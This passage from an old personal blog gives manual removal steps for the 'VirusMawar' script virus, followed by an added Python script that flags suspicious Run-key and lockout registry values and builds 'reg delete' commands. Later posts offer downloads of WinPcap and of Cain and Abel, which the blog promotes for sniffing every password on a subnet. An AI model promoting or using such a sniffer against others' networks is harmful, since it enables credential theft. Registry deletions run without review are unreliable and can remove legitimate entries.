After that, open your Task Manager by hitting "Ctrl+Alt+Delete" on your keyboard. Choose the "Process" tab. And wow.. a full list of processes!! Look carefully for "wscript.exe" in the list, select it and click the End Process button. At this point you have stopped the virus. But bear in mind that the virus will start again when you restart.

The solution is

Click the Start button and choose Run. Type "regedit" and hit Enter. Wow.. a list again.. :( Don't worry, just open HKEY_LOCAL_MACHINE, then SOFTWARE, then Microsoft, then Windows, CurrentVersion and Run. Look at the right hand side. There will be a VirusMawar entry. Just delete VirusMawar. Now you have prevented it from starting every time your computer restarts.

Find the virus.

This is the final part. Open Folder Options (Control Panel>Folder Options). Change the settings to match my folder options in the picture below. The changes are to Show hidden files, Hide protected operating system files and Hide extensions for known file types.

Happy Ending

- Open My Computer>C:/WINDOWS find VirusMawar.js and delete it.

- Open My Computer> C:/WINDOWS/System32/ find VirusMawar.js and delete it.

Finish.. Have a nice holiday..
Please review the other posts in this blog.
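The registry part of the removal above can be checked from a saved `reg query` listing. This is an added example, not part of the original post: it flags Run-key values that start a script host and the policy values that lock out Task Manager, Registry Editor and Folder Options, then builds the matching `reg delete` command. The sample listing and its value data are constructed, and the assumption that this virus uses the standard policy values `DisableTaskMgr`, `DisableRegistryTools` and `NoFolderOptions` is not confirmed by the post.

```python
import re

# Constructed sample of `reg query` output. The value data is invented for
# illustration; the post only names the Run value "VirusMawar".
SAMPLE = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    ctfmon.exe    REG_SZ    C:\WINDOWS\system32\ctfmon.exe
    VirusMawar    REG_SZ    wscript.exe C:\WINDOWS\VirusMawar.js

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
    DisableTaskMgr    REG_DWORD    0x1
    DisableRegistryTools    REG_DWORD    0x1

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
    NoFolderOptions    REG_DWORD    0x1
    NoDriveTypeAutoRun    REG_DWORD    0x91
"""

# Standard policy values that lock out Task Manager, Regedit and Folder Options
# (assumed to be what this virus sets; the post does not name them).
LOCKOUT_VALUES = {"disabletaskmgr", "disableregistrytools", "nofolderoptions"}
SCRIPT_RE = re.compile(r"\b[wc]script(\.exe)?\b|\.(js|jse|vbs|vbe|wsf)\b", re.I)
VALUE_RE = re.compile(r"^\s+(.+?)(?:\t| {2,})(REG_\w+)(?:\t| {2,})(.*)$")

def parse_reg_query(text):
    """Yield (key, value_name, type, data) from `reg query` text output."""
    key = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if not line[0].isspace():
            key = line.strip()      # unindented line = registry key path
            continue
        m = VALUE_RE.match(line)
        if m and key:
            yield key, m.group(1), m.group(2), m.group(3).strip()

def triage(text):
    """Return (kind, key, value_name, data) for each suspicious value."""
    findings = []
    for key, name, rtype, data in parse_reg_query(text):
        leaf = key.rsplit("\\", 1)[-1].lower()
        if leaf in ("run", "runonce") and SCRIPT_RE.search(data):
            findings.append(("persistence", key, name, data))
        elif (name.lower() in LOCKOUT_VALUES and rtype == "REG_DWORD"
              and int(data, 16) != 0):
            findings.append(("lockout", key, name, data))
    return findings

def remediation(finding):
    """Build the reg.exe command that deletes the flagged value."""
    _, key, name, _ = finding
    return f'reg delete "{key}" /v "{name}" /f'
```

Review each finding before running the generated command, since a legitimate login script in a Run key would be flagged the same way.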




Offer!!

I'm in a very good mood. Anybody who wants to know about any software and wants me to find it, just request me and I will upload it for you..

Winpcap 4.0.2

WinPcap is the industry-standard tool for link-layer network access in Windows environments: it allows applications to capture and transmit network packets bypassing the protocol stack, and has additional useful features, including kernel-level packet filtering, a network statistics engine and support for remote packet capture. WinPcap consists of a driver, that extends the operating system to provide low-level network access, and a library that is used to easily access the low-level network layers. This library also contains the Windows version of the well known libpcap Unix API. (more)

Download 1
Download2 (zip)

Cain and Abel


This is a powerful sniffing and cracking tool for the Windows platform. You can even sniff all passwords within your subnet. (more)

Download 1
Download 2 (zip)

Friday, January 25, 2008

Finally Published

After a few months, I finally have time to create my own blog.. thanks to time and technology